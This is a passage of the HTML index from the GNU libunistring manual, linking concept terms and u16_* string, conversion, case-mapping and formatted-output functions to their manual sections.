href="libunistring_4.html#SEC13">converting</a></td><td valign="top"><a href="libunistring_4.html#SEC13">4.2 Elementary string conversions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX160">converting</a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX44">copying</a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX91">copying</a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX65">counting</a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_3">D</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#SEC49">decomposing</a></td><td valign="top"><a href="libunistring_13.html#SEC49">13.1 Decomposition of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#SEC62">dependencies</a></td><td valign="top"><a href="libunistring_16.html#SEC62">16.1 Installation</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC59">detecting case</a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#SEC15">duplicating</a></td><td valign="top"><a href="libunistring_4.html#SEC15">4.4 Elementary string functions with memory allocation</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX121">duplicating</a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_4">E</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX156"><code>enum iconv_ilseq_handler</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_5">F</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_18.html#SEC75">FDL, GNU Free Documentation License</a></td><td valign="top"><a href="libunistring_18.html#SEC75">A.3 GNU Free Documentation License</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#SEC18">formatted output</a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX704">fullwidth</a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_6">G</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC21">general category</a></td><td valign="top"><a href="libunistring_8.html#SEC21">8.1 General category</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#IDX895"><code>gl_LIBUNISTRING</code></a></td><td valign="top"><a href="libunistring_16.html#SEC65">16.4 Autoconf macro</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_18.html#SEC69">GPL, GNU General Public License</a></td><td valign="top"><a href="libunistring_18.html#SEC69">A.1 GNU GENERAL PUBLIC LICENSE</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#SEC41">grapheme cluster boundaries</a></td><td valign="top"><a href="libunistring_10.html#SEC41">10. Grapheme cluster breaks in strings <code>&lt;unigbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#SEC41">grapheme cluster breaks</a></td><td valign="top"><a href="libunistring_10.html#SEC41">10. Grapheme cluster breaks in strings <code>&lt;unigbrk.h&gt;</code></a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_7">H</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX703">halfwidth</a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_8">I</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC38">identifiers</a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#IDX891">installation</a></td><td valign="top"><a href="libunistring_16.html#SEC62">16.1 Installation</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#SEC3">internationalization</a></td><td valign="top"><a href="libunistring_1.html#SEC3">1.2 Unicode and Internationalization</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#SEC14">iterating</a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX75">iterating</a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_9">J</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC38">Java, programming language</a></td><td valign="top"><a href="libunistring_8.html#SEC38">8.12 ISO C and Java syntax</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC32">joining group</a></td><td valign="top"><a href="libunistring_8.html#SEC32">8.8.2 Joining group of Arabic characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC30">joining of Arabic characters</a></td><td valign="top"><a href="libunistring_8.html#SEC30">8.8 Arabic shaping</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC31">joining type</a></td><td valign="top"><a href="libunistring_8.html#SEC31">8.8.1 Joining type of Arabic characters</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_10">L</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_18.html#SEC74">LGPL, GNU Lesser General Public License</a></td><td valign="top"><a href="libunistring_18.html#SEC74">A.2 GNU LESSER GENERAL PUBLIC LICENSE</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_18.html#SEC75">License, GNU FDL</a></td><td valign="top"><a href="libunistring_18.html#SEC75">A.3 GNU Free Documentation License</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_18.html#SEC69">License, GNU GPL</a></td><td valign="top"><a href="libunistring_18.html#SEC69">A.1 GNU GENERAL PUBLIC LICENSE</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_18.html#SEC74">License, GNU LGPL</a></td><td valign="top"><a href="libunistring_18.html#SEC74">A.2 GNU LESSER GENERAL PUBLIC LICENSE</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_18.html#SEC68">Licenses</a></td><td valign="top"><a href="libunistring_18.html#SEC68">A. Licenses</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#SEC47">line breaks</a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#SEC4">locale</a></td><td valign="top"><a href="libunistring_1.html#SEC4">1.3 Locale encodings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX7">locale categories</a></td><td valign="top"><a href="libunistring_1.html#SEC4">1.3 Locale encodings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX8">locale encoding</a></td><td valign="top"><a href="libunistring_1.html#SEC4">1.3 Locale encodings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX154">locale encoding</a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX818">locale language</a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_1.html#IDX9">locale, multibyte</a></td><td valign="top"><a href="libunistring_1.html#SEC6">1.5 &lsquo;<samp>char *</samp>&rsquo; strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX155"><code>locale_charset</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC56">lowercasing</a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_11">M</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_16.html#SEC66">mailing list</a></td><td valign="top"><a href="libunistring_16.html#SEC66">16.5 Reporting problems</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC29">mirroring, of Unicode character</a></td><td valign="top"><a href="libunistring_8.html#SEC29">8.7 Mirrored character</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_12">N</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#SEC48">normal forms</a></td><td valign="top"><a href="libunistring_13.html#SEC48">13. Normalization forms (composition and decomposition) <code>&lt;uninorm.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#SEC48">normalizing</a></td><td valign="top"><a href="libunistring_13.html#SEC48">13. Normalization forms (composition and decomposition) <code>&lt;uninorm.h&gt;</code></a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_13">O</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#SEC18">output, formatted</a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_14">P</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC33">properties, of Unicode character</a></td><td valign="top"><a href="libunistring_8.html#SEC33">8.9 Properties</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_15">R</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_15.html#SEC60">regular expression</a></td><td valign="top"><a href="libunistring_15.html#SEC60">15. Regular expressions <code>&lt;uniregex.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_17.html#IDX896">rendering</a></td><td valign="top"><a href="libunistring_17.html#SEC67">17. More advanced functionality</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_2.html#IDX15">return value conventions</a></td><td valign="top"><a href="libunistring_2.html#SEC9">2. Conventions</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_16">S</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_8.html#SEC36">scripts</a></td><td valign="top"><a href="libunistring_8.html#SEC36">8.10 Scripts</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX61">searching, for a character</a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX125">searching, for a character</a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX141">searching, for a substring</a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#SEC53">stream, normalizing a</a></td><td valign="top"><a href="libunistring_13.html#SEC53">13.5 Normalization of streams of Unicode characters</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX810"><code>struct uninorm_filter</code></a></td><td valign="top"><a href="libunistring_13.html#SEC53">13.5 Normalization of streams of Unicode characters</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_17">T</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#SEC56">titlecasing</a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td colspan="3"> <hr></td></tr> <tr><th><a name="SEC77_18">U</a></th><td></td><td></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX206"><code>u16_asnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX205"><code>u16_asprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX861"><code>u16_casecmp</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX873"><code>u16_casecoll</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX855"><code>u16_casefold</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX869"><code>u16_casexfrm</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX832"><code>u16_casing_prefix_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX835"><code>u16_casing_prefixes_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX840"><code>u16_casing_suffix_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX843"><code>u16_casing_suffixes_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX21"><code>u16_check</code></a></td><td valign="top"><a href="libunistring_4.html#SEC12">4.1 Elementary string checks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX63"><code>u16_chr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX56"><code>u16_cmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX59"><code>u16_cmp2</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX162"><code>u16_conv_from_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX165"><code>u16_conv_to_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX46"><code>u16_cpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX70"><code>u16_cpy_alloc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC15">4.4 Elementary string functions with memory allocation</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX858"><code>u16_ct_casefold</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX849"><code>u16_ct_tolower</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX852"><code>u16_ct_totitle</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX846"><code>u16_ct_toupper</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX149"><code>u16_endswith</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX719"><code>u16_grapheme_breaks</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX713"><code>u16_grapheme_next</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX716"><code>u16_grapheme_prev</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX889"><code>u16_is_cased</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX886"><code>u16_is_casefolded</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX880"><code>u16_is_lowercase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX883"><code>u16_is_titlecase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX877"><code>u16_is_uppercase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX30"><code>u16_mblen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX67"><code>u16_mbsnlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX36"><code>u16_mbtouc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX33"><code>u16_mbtouc_unsafe</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX39"><code>u16_mbtoucr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX49"><code>u16_move</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX80"><code>u16_next</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX797"><code>u16_normalize</code></a></td><td valign="top"><a href="libunistring_13.html#SEC51">13.3 Normalization of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX800"><code>u16_normcmp</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX808"><code>u16_normcoll</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX805"><code>u16_normxfrm</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX760"><code>u16_possible_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX83"><code>u16_prev</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX52"><code>u16_set</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX204"><code>u16_snprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX203"><code>u16_sprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX146"><code>u16_startswith</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX96"><code>u16_stpcpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX102"><code>u16_stpncpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX105"><code>u16_strcat</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX127"><code>u16_strchr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX112"><code>u16_strcmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX116"><code>u16_strcoll</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX168"><code>u16_strconv_from_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX174"><code>u16_strconv_from_locale</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX171"><code>u16_strconv_to_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX177"><code>u16_strconv_to_locale</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX93"><code>u16_strcpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX133"><code>u16_strcspn</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX123"><code>u16_strdup</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX86"><code>u16_strlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX73"><code>u16_strmblen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX77"><code>u16_strmbtouc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX108"><code>u16_strncat</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX119"><code>u16_strncmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX99"><code>u16_strncpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX89"><code>u16_strnlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX139"><code>u16_strpbrk</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX130"><code>u16_strrchr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX136"><code>u16_strspn</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX143"><code>u16_strstr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX152"><code>u16_strtok</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX710"><code>u16_strwidth</code></a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX26"><code>u16_to_u32</code></a></td><td valign="top"><a href="libunistring_4.html#SEC13">4.2 Elementary string conversions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX25"><code>u16_to_u8</code></a></td><td valign="top"><a href="libunistring_4.html#SEC13">4.2 Elementary string conversions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX824"><code>u16_tolower</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX827"><code>u16_totitle</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX821"><code>u16_toupper</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX214"><code>u16_u16_asnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX213"><code>u16_u16_asprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX212"><code>u16_u16_snprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX211"><code>u16_u16_sprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX218"><code>u16_u16_vasnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX217"><code>u16_u16_vasprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX216"><code>u16_u16_vsnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> 